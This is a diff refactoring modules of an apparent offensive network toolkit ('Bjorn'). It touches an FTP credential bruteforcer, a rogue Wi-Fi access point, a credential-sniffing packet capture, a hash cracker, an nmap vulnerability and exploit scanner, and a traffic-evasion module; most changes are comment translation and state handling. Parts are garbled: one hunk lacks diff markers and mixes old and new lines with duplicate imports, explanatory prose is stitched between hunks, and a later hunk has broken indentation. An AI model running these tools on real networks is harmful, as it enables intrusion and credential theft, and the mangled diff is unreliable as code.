     "input_dir": {
         "type": "text",
         "label": "Input Data Dir",
-        "default": "/home/bjorn/Bjorn/data/output"
+        "default": "data/output"
     },
     "output_dir": {
         "type": "text",
         "label": "Reports Dir",
-        "default": "/home/bjorn/Bjorn/data/reports"
+        "default": "data/reports"
     },
     "watch": {
         "type": "checkbox",

@@ -92,7 +92,8 @@ class FreyaHarvest:
                 with self.lock:
                     self.data[cat].append(finds)
                     new_findings += 1
-        except: pass
+        except Exception:
+            logger.debug(f"Failed to read {f_path}")
 
         if new_findings > 0:
             logger.info(f"FreyaHarvest: Collected {new_findings} new intelligence items.")

@@ -123,20 +124,30 @@ class FreyaHarvest:
         self.shared_data.log_milestone(b_class, "ReportGenerated", f"MD: {os.path.basename(out_file)}")
 
     def execute(self, ip, port, row, status_key) -> str:
-        input_dir = getattr(self.shared_data, "freya_harvest_input", b_args["input_dir"]["default"])
-        output_dir = getattr(self.shared_data, "freya_harvest_output", b_args["output_dir"]["default"])
+        # Reset per-run state to prevent memory accumulation
+        self.data.clear()
+        self.last_scan_time = 0
+
+        _data_dir = getattr(self.shared_data, "data_dir", "/home/bjorn/Bjorn/data")
+        _default_input = os.path.join(_data_dir, "output")
+        _default_output = os.path.join(_data_dir, "reports")
+        input_dir = getattr(self.shared_data, "freya_harvest_input", _default_input)
+        output_dir = getattr(self.shared_data, "freya_harvest_output", _default_output)
         watch = getattr(self.shared_data, "freya_harvest_watch", True)
         fmt = getattr(self.shared_data, "freya_harvest_format", "all")
         timeout = int(getattr(self.shared_data, "freya_harvest_timeout", 600))
 
         logger.info(f"FreyaHarvest: Starting data harvest from {input_dir}")
         self.shared_data.log_milestone(b_class, "Startup", "Monitoring intelligence directories")
+        # EPD live status
+        self.shared_data.comment_params = {"input": os.path.basename(input_dir), "items": "0"}
 
         start_time = time.time()
         try:
             while time.time() - start_time < timeout:
                 if self.shared_data.orchestrator_should_exit:
-                    break
+                    logger.info("FreyaHarvest: Interrupted by orchestrator.")
+                    return "interrupted"
 
                 self._collect_data(input_dir)
                 self._generate_report(output_dir, fmt)

@@ -145,6 +156,9 @@ class FreyaHarvest:
                 elapsed = int(time.time() - start_time)
                 prog = int((elapsed / timeout) * 100)
                 self.shared_data.bjorn_progress = f"{prog}%"
+                # EPD live status update
+                total_items = sum(len(v) for v in self.data.values())
+                self.shared_data.comment_params = {"input": os.path.basename(input_dir), "items": str(total_items)}
 
                 if not watch:
                     break

@@ -156,6 +170,9 @@ class FreyaHarvest:
         except Exception as e:
             logger.error(f"FreyaHarvest error: {e}")
             return "failed"
+        finally:
+            self.shared_data.bjorn_progress = ""
+            self.shared_data.comment_params = {}
 
         return "success"
 
@@ -1,10 +1,4 @@
-"""
-ftp_bruteforce.py — FTP bruteforce (DB-backed, no CSV/JSON, no rich)
-- Cibles: (ip, port) par l'orchestrateur
-- IP -> (MAC, hostname) via DB.hosts
-- Succès -> DB.creds (service='ftp')
-- Conserve la logique d'origine (queue/threads, sleep éventuels, etc.)
-"""
+"""ftp_bruteforce.py - Threaded FTP credential bruteforcer, results stored in DB."""
 
 import os
 import threading

@@ -28,11 +22,24 @@ b_parent = None
 b_service = '["ftp"]'
 b_trigger = 'on_any:["on_service:ftp","on_new_port:21"]'
 b_priority = 70
-b_cooldown = 1800        # 30 minutes entre deux runs
-b_rate_limit = '3/86400' # 3 fois par jour max
+b_cooldown = 1800        # 30 min between runs
+b_rate_limit = '3/86400' # max 3 per day
 b_enabled = 1
 b_action = "normal"
+b_timeout = 600
+b_max_retries = 2
+b_stealth_level = 3
+b_risk_level = "medium"
+b_tags = ["bruteforce", "ftp", "credentials"]
+b_category = "exploitation"
+b_name = "FTP Bruteforce"
+b_description = "Threaded FTP credential bruteforcer with share enumeration."
+b_author = "Bjorn Team"
+b_version = "2.0.0"
+b_icon = "FTPBruteforce.png"
 
 class FTPBruteforce:
-    """Wrapper orchestrateur -> FTPConnector."""
+    """Orchestrator wrapper for FTPConnector."""
 
     def __init__(self, shared_data):
         self.shared_data = shared_data

@@ -40,11 +47,11 @@ class FTPBruteforce:
         logger.info("FTPConnector initialized.")
 
     def bruteforce_ftp(self, ip, port):
-        """Lance le bruteforce FTP pour (ip, port)."""
+        """Run FTP bruteforce for (ip, port)."""
         return self.ftp_bruteforce.run_bruteforce(ip, port)
 
     def execute(self, ip, port, row, status_key):
-        """Point d'entrée orchestrateur (retour 'success' / 'failed')."""
+        """Orchestrator entry point. Returns 'success' or 'failed'."""
         self.shared_data.bjorn_orch_status = "FTPBruteforce"
         self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
         logger.info(f"Brute forcing FTP on {ip}:{port}...")

@@ -53,12 +60,11 @@ class FTPBruteforce:
 
 
 class FTPConnector:
-    """Gère les tentatives FTP, persistance DB, mapping IP→(MAC, Hostname)."""
+    """Handles FTP attempts, DB persistence, and IP->(MAC, Hostname) mapping."""
 
     def __init__(self, shared_data):
         self.shared_data = shared_data
 
-        # Wordlists inchangées
         self.users = self._read_lines(shared_data.users_file)
         self.passwords = self._read_lines(shared_data.passwords_file)

@@ -71,7 +77,7 @@ class FTPConnector:
         self.queue = Queue()
         self.progress = None
 
-    # ---------- util fichiers ----------
+    # ---------- file utils ----------
     @staticmethod
     def _read_lines(path: str) -> List[str]:
         try:

@@ -186,7 +192,7 @@ class FTPConnector:
                 self.progress.advance(1)
             self.queue.task_done()
 
-            # Pause configurable entre chaque tentative FTP
+            # Configurable delay between FTP attempts
             if getattr(self.shared_data, "timewait_ftp", 0) > 0:
                 time.sleep(self.shared_data.timewait_ftp)

@@ -267,7 +273,8 @@ class FTPConnector:
         self.results = []
 
     def removeduplicates(self):
-        pass
+        """No longer needed with unique DB index; kept for interface compat."""
+        # Dedup handled by DB UNIQUE constraint + ON CONFLICT in save_results
 
 
 if __name__ == "__main__":
@@ -119,6 +119,14 @@ class HeimdallGuard:
         return packet
 
     def execute(self, ip, port, row, status_key) -> str:
+        if not HAS_SCAPY:
+            logger.error("HeimdallGuard requires scapy but it is not installed.")
+            return "failed"
+
+        # Reset per-run state
+        self.stats = {'packets_processed': 0, 'packets_fragmented': 0, 'timing_adjustments': 0}
+        self.packet_queue.clear()
+
         iface = getattr(self.shared_data, "heimdall_guard_interface", conf.iface)
         mode = getattr(self.shared_data, "heimdall_guard_mode", "all")
         delay = float(getattr(self.shared_data, "heimdall_guard_delay", 1.0))

@@ -126,6 +134,8 @@ class HeimdallGuard:
 
         logger.info(f"HeimdallGuard: Engaging stealth mode ({mode}) on {iface}")
         self.shared_data.log_milestone(b_class, "StealthActive", f"Mode: {mode}")
+        # EPD live status
+        self.shared_data.comment_params = {"ip": ip, "mode": mode, "iface": iface}
 
         self.active = True
         start_time = time.time()

@@ -133,10 +143,8 @@ class HeimdallGuard:
         try:
             while time.time() - start_time < timeout:
                 if self.shared_data.orchestrator_should_exit:
-                    break
-
-                # In a real scenario, this would be hooking into a packet stream
-                # For this action, we simulate protection state
+                    logger.info("HeimdallGuard: Interrupted by orchestrator.")
+                    return "interrupted"
 
                 # Progress reporting
                 elapsed = int(time.time() - start_time)

@@ -158,6 +166,8 @@ class HeimdallGuard:
             return "failed"
         finally:
             self.active = False
+            self.shared_data.bjorn_progress = ""
+            self.shared_data.comment_params = {}
 
         return "success"
 
@@ -12,6 +12,7 @@ import subprocess
 import threading
 import time
 import re
+import tempfile
 import datetime
 
 from typing import Any, Dict, List, Optional

@@ -126,7 +127,7 @@ class LokiDeceiver:
             'rsn_pairwise=CCMP'
         ])
 
-        h_path = '/tmp/bjorn_hostapd.conf'
+        h_path = os.path.join(tempfile.gettempdir(), 'bjorn_hostapd.conf')
         with open(h_path, 'w') as f:
             f.write('\n'.join(h_conf))

@@ -140,7 +141,7 @@ class LokiDeceiver:
             'log-queries',
             'log-dhcp'
         ]
-        d_path = '/tmp/bjorn_dnsmasq.conf'
+        d_path = os.path.join(tempfile.gettempdir(), 'bjorn_dnsmasq.conf')
         with open(d_path, 'w') as f:
             f.write('\n'.join(d_conf))

@@ -170,10 +171,16 @@ class LokiDeceiver:
         channel = int(getattr(self.shared_data, "loki_deceiver_channel", 6))
         password = getattr(self.shared_data, "loki_deceiver_password", "")
         timeout = int(getattr(self.shared_data, "loki_deceiver_timeout", 600))
-        output_dir = getattr(self.shared_data, "loki_deceiver_output", "/home/bjorn/Bjorn/data/output/wifi")
+        _fallback_dir = os.path.join(getattr(self.shared_data, "data_dir", "/home/bjorn/Bjorn/data"), "output", "wifi")
+        output_dir = getattr(self.shared_data, "loki_deceiver_output", _fallback_dir)
+
+        # Reset per-run state
+        self.active_clients.clear()
 
         logger.info(f"LokiDeceiver: Starting Rogue AP '{ssid}' on {iface}")
         self.shared_data.log_milestone(b_class, "Startup", f"Creating AP: {ssid}")
+        # EPD live status
+        self.shared_data.comment_params = {"ssid": ssid, "iface": iface, "channel": str(channel)}
 
         try:
             self.stop_event.clear()

@@ -181,7 +188,8 @@ class LokiDeceiver:
             h_path, d_path = self._create_configs(iface, ssid, channel, password)
 
             # Set IP for interface
-            subprocess.run(['sudo', 'ifconfig', iface, '192.168.1.1', 'netmask', '255.255.255.0'], capture_output=True)
+            subprocess.run(['sudo', 'ip', 'addr', 'add', '192.168.1.1/24', 'dev', iface], capture_output=True)
+            subprocess.run(['sudo', 'ip', 'link', 'set', iface, 'up'], capture_output=True)
 
             # Start processes
             # Use DEVNULL to avoid blocking on unread PIPE buffers.

@@ -208,7 +216,8 @@ class LokiDeceiver:
             start_time = time.time()
             while time.time() - start_time < timeout:
                 if self.shared_data.orchestrator_should_exit:
-                    break
+                    logger.info("LokiDeceiver: Interrupted by orchestrator.")
+                    return "interrupted"
 
                 # Check if procs still alive
                 if self.hostapd_proc.poll() is not None:

@@ -219,6 +228,8 @@ class LokiDeceiver:
                 elapsed = int(time.time() - start_time)
                 prog = int((elapsed / timeout) * 100)
                 self.shared_data.bjorn_progress = f"{prog}%"
+                # EPD live status update
+                self.shared_data.comment_params = {"ssid": ssid, "clients": str(len(self.active_clients)), "uptime": str(elapsed)}
 
                 if elapsed % 60 == 0:
                     self.shared_data.log_milestone(b_class, "Status", f"Uptime: {elapsed}s | Clients: {len(self.active_clients)}")

@@ -244,10 +255,12 @@ class LokiDeceiver:
             for p in [self.hostapd_proc, self.dnsmasq_proc]:
                 if p:
                     try: p.terminate(); p.wait(timeout=5)
-                    except: pass
+                    except Exception: pass
 
             # Restore NetworkManager if needed (custom logic based on usage)
             # subprocess.run(['sudo', 'systemctl', 'start', 'NetworkManager'], capture_output=True)
+            self.shared_data.bjorn_progress = ""
+            self.shared_data.comment_params = {}
 
         return "success"
 
@@ -1,16 +1,11 @@
"""
Vulnerability Scanner Action
Scanne ultra-rapidement CPE (+ CVE via vulners si dispo),
avec fallback "lourd" optionnel.
Affiche une progression en % dans Bjorn.
"""
"""nmap_vuln_scanner.py - Nmap-based CPE/CVE vulnerability scanning with vulners integration."""

import re
import time
import nmap
import json
import logging
from datetime import datetime, timedelta
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Any

from shared import SharedData
@@ -31,18 +26,28 @@ b_priority = 11
b_cooldown = 0
b_enabled = 1
b_rate_limit = None
b_timeout = 600
b_max_retries = 2
b_stealth_level = 3
b_risk_level = "medium"
b_tags = ["vuln", "nmap", "cpe", "cve", "scanner"]
b_category = "recon"
b_name = "Nmap Vuln Scanner"
b_description = "Nmap-based CPE/CVE vulnerability scanning with vulners integration."
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "NmapVulnScanner.png"

# Regex compilé une seule fois (gain CPU sur Pi Zero)
# Pre-compiled regex (saves CPU on Pi Zero)
CVE_RE = re.compile(r'CVE-\d{4}-\d{4,7}', re.IGNORECASE)


class NmapVulnScanner:
    """Scanner de vulnérabilités via nmap (mode rapide CPE/CVE) avec progression."""
    """Nmap vulnerability scanner (fast CPE/CVE mode) with progress tracking."""

    def __init__(self, shared_data: SharedData):
        self.shared_data = shared_data
        # Pas de self.nm partagé : on instancie dans chaque méthode de scan
        # pour éviter les corruptions d'état entre batches.
        # No shared self.nm: instantiate per scan method to avoid state corruption between batches
        logger.info("NmapVulnScanner initialized")

    # ---------------------------- Public API ---------------------------- #
@@ -54,7 +59,7 @@ class NmapVulnScanner:
            self.shared_data.bjorn_progress = "0%"

            if self.shared_data.orchestrator_should_exit:
                return 'failed'
                return 'interrupted'

            # 1) Metadata
            meta = {}
@@ -63,7 +68,7 @@ class NmapVulnScanner:
            except Exception:
                pass

            # 2) Récupérer MAC et TOUS les ports
            # 2) Get MAC and ALL ports
            mac = row.get("MAC Address") or row.get("mac_address") or ""

            ports_str = ""
@@ -87,13 +92,13 @@ class NmapVulnScanner:

            ports = [p.strip() for p in ports_str.split(';') if p.strip()]

            # Nettoyage des ports (garder juste le numéro si format 80/tcp)
            # Strip port format (keep just the number from "80/tcp")
            ports = [p.split('/')[0] for p in ports]

            self.shared_data.comment_params = {"ip": ip, "ports": str(len(ports))}
            logger.debug(f"Found {len(ports)} ports for {ip}: {ports[:5]}...")

            # 3) Filtrage "Rescan Only"
            # 3) "Rescan Only" filtering
            if self.shared_data.config.get('vuln_rescan_on_change_only', False):
                if self._has_been_scanned(mac):
                    original_count = len(ports)
@@ -105,24 +110,24 @@ class NmapVulnScanner:
                    self.shared_data.bjorn_progress = "100%"
                    return 'success'

            # 4) SCAN AVEC PROGRESSION
            # 4) SCAN WITH PROGRESS
            if self.shared_data.orchestrator_should_exit:
                return 'failed'
                return 'interrupted'

            logger.info(f"Starting nmap scan on {len(ports)} ports for {ip}")
            findings = self.scan_vulnerabilities(ip, ports)

            if self.shared_data.orchestrator_should_exit:
                logger.info("Scan interrupted by user")
                return 'failed'
                return 'interrupted'

            # 5) Déduplication en mémoire avant persistance
            # 5) In-memory dedup before persistence
            findings = self._deduplicate_findings(findings)

            # 6) Persistance
            self.save_vulnerabilities(mac, ip, findings)

            # Finalisation UI
            # Final UI update
            self.shared_data.bjorn_progress = "100%"
            self.shared_data.comment_params = {"ip": ip, "vulns_found": str(len(findings))}
            logger.success(f"Vuln scan done on {ip}: {len(findings)} entries")
@@ -130,7 +135,7 @@ class NmapVulnScanner:

        except Exception as e:
            logger.error(f"NmapVulnScanner failed for {ip}: {e}")
            self.shared_data.bjorn_progress = "Error"
            self.shared_data.bjorn_progress = "0%"
            return 'failed'

    def _has_been_scanned(self, mac: str) -> bool:
@@ -161,7 +166,7 @@ class NmapVulnScanner:

        ttl = int(self.shared_data.config.get('vuln_rescan_ttl_seconds', 0) or 0)
        if ttl > 0:
            cutoff = datetime.utcnow() - timedelta(seconds=ttl)
            cutoff = datetime.now(timezone.utc) - timedelta(seconds=ttl)
        final_ports = []
        for p in ports:
            if p not in seen:
@@ -180,7 +185,7 @@ class NmapVulnScanner:
    # ---------------------------- Helpers -------------------------------- #

    def _deduplicate_findings(self, findings: List[Dict]) -> List[Dict]:
        """Supprime les doublons (même port + vuln_id) pour éviter des inserts inutiles."""
        """Remove duplicates (same port + vuln_id) to avoid redundant inserts."""
        seen: set = set()
        deduped = []
        for f in findings:
@@ -201,7 +206,7 @@ class NmapVulnScanner:
        return [str(cpe).strip()]

    def extract_cves(self, text: str) -> List[str]:
        """Extrait les CVE via regex pré-compilé (pas de recompilation à chaque appel)."""
        """Extract CVEs using pre-compiled regex."""
        if not text:
            return []
        return CVE_RE.findall(str(text))
@@ -210,8 +215,7 @@ class NmapVulnScanner:

    def scan_vulnerabilities(self, ip: str, ports: List[str]) -> List[Dict]:
        """
        Orchestre le scan en lots (batches) pour permettre la mise à jour
        de la barre de progression.
        Orchestrate scanning in batches for progress bar updates.
        """
        all_findings = []

@@ -219,10 +223,10 @@ class NmapVulnScanner:
        use_vulners = bool(self.shared_data.config.get('nse_vulners', False))
        max_ports = int(self.shared_data.config.get('vuln_max_ports', 10 if fast else 20))

        # Pause entre batches – important sur Pi Zero pour laisser respirer le CPU
        # Pause between batches -- important on Pi Zero to let the CPU breathe
        batch_pause = float(self.shared_data.config.get('vuln_batch_pause', 0.5))

        # Taille de lot réduite par défaut (2 sur Pi Zero, configurable)
        # Reduced batch size by default (2 on Pi Zero, configurable)
        batch_size = int(self.shared_data.config.get('vuln_batch_size', 2))

        target_ports = ports[:max_ports]
@@ -240,7 +244,7 @@ class NmapVulnScanner:

            port_str = ','.join(batch)

            # Mise à jour UI avant le scan du lot
            # UI update before batch scan
            pct = int((processed_count / total) * 100)
            self.shared_data.bjorn_progress = f"{pct}%"
            self.shared_data.comment_params = {
@@ -251,7 +255,7 @@ class NmapVulnScanner:

            t0 = time.time()

            # Scan du lot (instanciation locale pour éviter la corruption d'état)
            # Scan batch (local instance to avoid state corruption)
            if fast:
                batch_findings = self._scan_fast_cpe_cve(ip, port_str, use_vulners)
            else:
@@ -263,11 +267,11 @@ class NmapVulnScanner:
            all_findings.extend(batch_findings)
            processed_count += len(batch)

            # Mise à jour post-lot
            # Post-batch update
            pct = int((processed_count / total) * 100)
            self.shared_data.bjorn_progress = f"{pct}%"

            # Pause CPU entre batches (vital sur Pi Zero)
            # CPU pause between batches (vital on Pi Zero)
            if batch_pause > 0 and processed_count < total:
                time.sleep(batch_pause)

@@ -275,10 +279,10 @@ class NmapVulnScanner:

    def _scan_fast_cpe_cve(self, ip: str, port_list: str, use_vulners: bool) -> List[Dict]:
        vulns: List[Dict] = []
        nm = nmap.PortScanner()  # Instance locale – pas de partage d'état
        nm = nmap.PortScanner()  # Local instance -- no shared state

        # --version-light au lieu de --version-all : bien plus rapide sur Pi Zero
        # --min-rate/--max-rate : évite de saturer CPU et réseau
        # --version-light instead of --version-all: much faster on Pi Zero
        # --min-rate/--max-rate: avoid saturating CPU and network
        args = (
            "-sV --version-light -T4 "
            "--max-retries 1 --host-timeout 60s --script-timeout 20s "
@@ -329,14 +333,14 @@ class NmapVulnScanner:

    def _scan_heavy(self, ip: str, port_list: str) -> List[Dict]:
        vulnerabilities: List[Dict] = []
        nm = nmap.PortScanner()  # Instance locale
        nm = nmap.PortScanner()  # Local instance

        vuln_scripts = [
            'vuln', 'exploit', 'http-vuln-*', 'smb-vuln-*',
            'ssl-*', 'ssh-*', 'ftp-vuln-*', 'mysql-vuln-*',
        ]
        script_arg = ','.join(vuln_scripts)
        # --min-rate/--max-rate pour ne pas saturer le Pi
        # --min-rate/--max-rate to avoid saturating the Pi
        args = (
            f"-sV --script={script_arg} -T3 "
            "--script-timeout 30s --min-rate 50 --max-rate 100"
@@ -371,7 +375,7 @@ class NmapVulnScanner:
                        'details': str(output)[:200]
                    })

        # CPE Scan optionnel (sur ce batch)
        # Optional CPE scan (on this batch)
        if bool(self.shared_data.config.get('scan_cpe', False)):
            ports_for_cpe = list(discovered_ports_in_batch)
            if ports_for_cpe:
@@ -381,10 +385,10 @@ class NmapVulnScanner:

    def scan_cpe(self, ip: str, ports: List[str]) -> List[Dict]:
        cpe_vulns = []
        nm = nmap.PortScanner()  # Instance locale
        nm = nmap.PortScanner()  # Local instance
        try:
            port_list = ','.join([str(p) for p in ports])
            # --version-light à la place de --version-all (bien plus rapide)
            # --version-light instead of --version-all (much faster)
            args = "-sV --version-light -T4 --max-retries 1 --host-timeout 45s"
            nm.scan(hosts=ip, ports=port_list, arguments=args)

@@ -430,7 +434,7 @@ class NmapVulnScanner:
            if vid_upper.startswith('CVE-'):
                findings_by_port[port]['cves'].add(vid)
            elif vid_upper.startswith('CPE:'):
                # On stocke sans le préfixe "CPE:"
                # Store without the "CPE:" prefix
                findings_by_port[port]['cpes'].add(vid[4:])

        # 1) CVEs

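The batching logic above computes progress as processed/total across fixed-size port batches, with a pause between batches. A standalone sketch of the same idea (generic helper, not tied to Bjorn's SharedData):

    from typing import Iterable, List

    def batches(items: List[str], size: int) -> Iterable[List[str]]:
        """Yield fixed-size chunks; the last chunk may be smaller."""
        for i in range(0, len(items), size):
            yield items[i:i + size]

    ports = [str(p) for p in (22, 80, 443, 445, 3306)]
    processed = 0
    for batch in batches(ports, 2):
        # ... scan ','.join(batch) here ...
        processed += len(batch)
        print(f"{int(processed / len(ports) * 100)}%")  # prints 40% / 80% / 100%
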
@@ -179,6 +179,10 @@ class OdinEye:

    def execute(self, ip, port, row, status_key) -> str:
        """Standard entry point."""
        # Reset per-run state to prevent accumulation across reused instances
        self.credentials.clear()
        self.statistics.clear()

        iface = getattr(self.shared_data, "odin_eye_interface", "auto")
        if iface == "auto":
            iface = None  # pyshark handles None as default
@@ -186,10 +190,17 @@ class OdinEye:
        bpf_filter = getattr(self.shared_data, "odin_eye_filter", b_args["filter"]["default"])
        max_pkts = int(getattr(self.shared_data, "odin_eye_max_packets", 1000))
        timeout = int(getattr(self.shared_data, "odin_eye_timeout", 300))
        output_dir = getattr(self.shared_data, "odin_eye_output", "/home/bjorn/Bjorn/data/output/packets")
        _fallback_dir = os.path.join(getattr(self.shared_data, "data_dir", "/home/bjorn/Bjorn/data"), "output", "packets")
        output_dir = getattr(self.shared_data, "odin_eye_output", _fallback_dir)

        logger.info(f"OdinEye: Starting capture on {iface or 'default'} (filter: {bpf_filter})")
        self.shared_data.log_milestone(b_class, "Startup", f"Sniffing on {iface or 'any'}")
        # EPD live status
        self.shared_data.comment_params = {"iface": iface or "any", "filter": bpf_filter[:30]}

        if not HAS_PYSHARK:
            logger.error("OdinEye requires pyshark but it is not installed.")
            return "failed"

        try:
            self.capture = pyshark.LiveCapture(interface=iface, bpf_filter=bpf_filter)
@@ -217,6 +228,8 @@ class OdinEye:
                if packet_count % 50 == 0:
                    prog = int((packet_count / max_pkts) * 100)
                    self.shared_data.bjorn_progress = f"{prog}%"
                    # EPD live status update
                    self.shared_data.comment_params = {"packets": str(packet_count), "creds": str(len(self.credentials))}
                    self.shared_data.log_milestone(b_class, "Status", f"Captured {packet_count} packets")

        except Exception as e:
@@ -226,7 +239,7 @@ class OdinEye:
        finally:
            if self.capture:
                try: self.capture.close()
                except: pass
                except Exception: pass

        # Save results
        if self.credentials or self.statistics['total_packets'] > 0:
@@ -238,6 +251,8 @@ class OdinEye:
                    "credentials": self.credentials
                }, f, indent=4)
            self.shared_data.log_milestone(b_class, "Complete", f"Capture finished. {len(self.credentials)} creds found.")
        self.shared_data.bjorn_progress = ""
        self.shared_data.comment_params = {}

        return "success"


@@ -1,11 +1,5 @@
# actions/presence_join.py
# -*- coding: utf-8 -*-
"""
PresenceJoin — Sends a Discord webhook when the targeted host JOINS the network.
- Triggered by the scheduler ONLY on transition OFF->ON (b_trigger="on_join").
- Targeting via b_requires (e.g. {"any":[{"mac_is":"AA:BB:..."}]}).
- The action does not query anything: it only notifies when called.
"""
"""presence_join.py - Discord webhook notification when a target host joins the network."""

import requests
from typing import Optional
@@ -28,7 +22,20 @@ b_priority = 90
b_cooldown = 0  # not needed: on_join only fires on join transition
b_rate_limit = None
b_trigger = "on_join"  # <-- Host JOINED the network (OFF -> ON since last scan)
b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]}  # adapt as needed
b_requires = None  # Configure via DB to restrict to specific MACs if needed
b_enabled = 1
b_action = "normal"
b_category = "notification"
b_name = "Presence Join"
b_description = "Sends a Discord webhook notification when a host joins the network."
b_author = "Bjorn Team"
b_version = "1.0.0"
b_timeout = 30
b_max_retries = 1
b_stealth_level = 10
b_risk_level = "low"
b_tags = ["presence", "discord", "notification"]
b_icon = "PresenceJoin.png"

DISCORD_WEBHOOK_URL = ""  # Configure via shared_data or DB

@@ -60,6 +67,8 @@ class PresenceJoin:
        host = row.get("hostname") or (row.get("hostnames") or "").split(";")[0] if row.get("hostnames") else None
        name = f"{host} ({mac})" if host else mac
        ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()
        # EPD live status
        self.shared_data.comment_params = {"mac": mac, "host": host or "unknown", "ip": ip_s or "?"}

        # Add timestamp in UTC
        timestamp = datetime.datetime.now(datetime.timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")

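The `b_requires` shape shown above ({"any":[{"mac_is": ...}]}) reads as a small targeting predicate. How the scheduler evaluates it is not part of this diff; a plausible, purely hypothetical evaluator covering only the two operators seen here (`any` plus `mac_is`) might look like:

    from typing import Optional

    def requires_match(requires: Optional[dict], host: dict) -> bool:
        """Hypothetical evaluator: None matches everything; 'any' ORs its clauses."""
        if not requires:
            return True
        for clause in requires.get("any", []):
            want = clause.get("mac_is", "")
            if want and host.get("mac", "").lower() == want.lower():
                return True
        return False

    print(requires_match(None, {"mac": "aa:bb:cc:dd:ee:ff"}))        # True
    print(requires_match({"any": [{"mac_is": "60:57:C8:51:63:FB"}]},
                         {"mac": "60:57:c8:51:63:fb"}))              # True
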
@@ -1,11 +1,5 @@
# actions/presence_left.py
# -*- coding: utf-8 -*-
"""
PresenceLeave — Sends a Discord webhook when the targeted host LEAVES the network.
- Triggered by the scheduler ONLY on transition ON->OFF (b_trigger="on_leave").
- Targeting via b_requires (e.g. {"any":[{"mac_is":"AA:BB:..."}]}).
- The action does not query anything: it only notifies when called.
"""
"""presence_left.py - Discord webhook notification when a target host leaves the network."""

import requests
from typing import Optional
@@ -28,8 +22,20 @@ b_priority = 90
b_cooldown = 0  # not needed: on_leave only fires on leave transition
b_rate_limit = None
b_trigger = "on_leave"  # <-- Host LEFT the network (ON -> OFF since last scan)
b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]}  # adapt as needed
b_enabled = 1
b_requires = None  # Configure via DB to restrict to specific MACs if needed
b_enabled = 1
b_action = "normal"
b_category = "notification"
b_name = "Presence Leave"
b_description = "Sends a Discord webhook notification when a host leaves the network."
b_author = "Bjorn Team"
b_version = "1.0.0"
b_timeout = 30
b_max_retries = 1
b_stealth_level = 10
b_risk_level = "low"
b_tags = ["presence", "discord", "notification"]
b_icon = "PresenceLeave.png"

DISCORD_WEBHOOK_URL = ""  # Configure via shared_data or DB

@@ -60,6 +66,8 @@ class PresenceLeave:
        mac = row.get("MAC Address") or row.get("mac_address") or "MAC"
        host = row.get("hostname") or (row.get("hostnames") or "").split(";")[0] if row.get("hostnames") else None
        ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()
        # EPD live status
        self.shared_data.comment_params = {"mac": mac, "host": host or "unknown", "ip": ip_s or "?"}

        # Add timestamp in UTC
        timestamp = datetime.datetime.now(datetime.timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")

@@ -82,7 +82,11 @@ class RuneCracker:
            return hashlib.sha512(password.encode()).hexdigest()
        elif h_type == 'ntlm':
            # NTLM is MD4(UTF-16LE(password))
            return hashlib.new('md4', password.encode('utf-16le')).hexdigest()
            try:
                return hashlib.new('md4', password.encode('utf-16le')).hexdigest()
            except ValueError:
                # MD4 not available in this Python build (e.g., FIPS mode)
                return None
        except Exception as e:
            logger.debug(f"Hashing error ({h_type}): {e}")
            return None
@@ -107,6 +111,8 @@ class RuneCracker:
                }
                logger.success(f"Cracked {h_type}: {hv[:8]}... -> {password}")
                self.shared_data.log_milestone(b_class, "Cracked", f"{h_type} found!")
                # EPD live status update
                self.shared_data.comment_params = {"hashes": str(len(self.hashes)), "cracked": str(len(self.cracked))}

        progress.advance()

@@ -115,7 +121,8 @@ class RuneCracker:
        input_file = str(getattr(self.shared_data, "rune_cracker_input", ""))
        wordlist_path = str(getattr(self.shared_data, "rune_cracker_wordlist", ""))
        self.hash_type = getattr(self.shared_data, "rune_cracker_type", None)
        output_dir = getattr(self.shared_data, "rune_cracker_output", "/home/bjorn/Bjorn/data/output/hashes")
        _fallback_dir = os.path.join(getattr(self.shared_data, "data_dir", "/home/bjorn/Bjorn/data"), "output", "hashes")
        output_dir = getattr(self.shared_data, "rune_cracker_output", _fallback_dir)

        if not input_file or not os.path.exists(input_file):
            # Fallback: Check for latest odin_recon or other hashes if running in generic mode
@@ -127,6 +134,8 @@ class RuneCracker:
            logger.error(f"Input file not found: {input_file}")
            return "failed"

        # Reset per-run state to prevent accumulation across reused instances
        self.cracked.clear()
        # Load hashes
        self.hashes.clear()
        try:
@@ -150,6 +159,8 @@ class RuneCracker:

        logger.info(f"RuneCracker: Loaded {len(self.hashes)} hashes. Starting engine...")
        self.shared_data.log_milestone(b_class, "Initialization", f"Loaded {len(self.hashes)} hashes")
        # EPD live status
        self.shared_data.comment_params = {"hashes": str(len(self.hashes)), "cracked": "0"}

        # Prepare password plan
        dict_passwords = []
@@ -167,34 +178,38 @@ class RuneCracker:
        self.shared_data.log_milestone(b_class, "Bruteforce", f"Testing {len(all_candidates)} candidates")

        try:
            with ThreadPoolExecutor(max_workers=self.max_workers) as executor:
                for pwd in all_candidates:
                    if self.shared_data.orchestrator_should_exit:
                        executor.shutdown(wait=False)
                        return "interrupted"
                    executor.submit(self._crack_password_worker, pwd, progress)
        except Exception as e:
            logger.error(f"Cracking engine error: {e}")
            return "failed"
            try:
                with ThreadPoolExecutor(max_workers=self.max_workers) as executor:
                    for pwd in all_candidates:
                        if self.shared_data.orchestrator_should_exit:
                            executor.shutdown(wait=False, cancel_futures=True)
                            return "interrupted"
                        executor.submit(self._crack_password_worker, pwd, progress)
            except Exception as e:
                logger.error(f"Cracking engine error: {e}")
                return "failed"

        # Save results
        if self.cracked:
            os.makedirs(output_dir, exist_ok=True)
            out_file = os.path.join(output_dir, f"cracked_{int(time.time())}.json")
            with open(out_file, 'w', encoding="utf-8") as f:
                json.dump({
                    "target_file": input_file,
                    "total_hashes": len(self.hashes),
                    "cracked_count": len(self.cracked),
                    "results": self.cracked
                }, f, indent=4)
            logger.success(f"Cracked {len(self.cracked)} hashes! Results: {out_file}")
            self.shared_data.log_milestone(b_class, "Complete", f"Cracked {len(self.cracked)} hashes")
            return "success"
            # Save results
            if self.cracked:
                os.makedirs(output_dir, exist_ok=True)
                out_file = os.path.join(output_dir, f"cracked_{int(time.time())}.json")
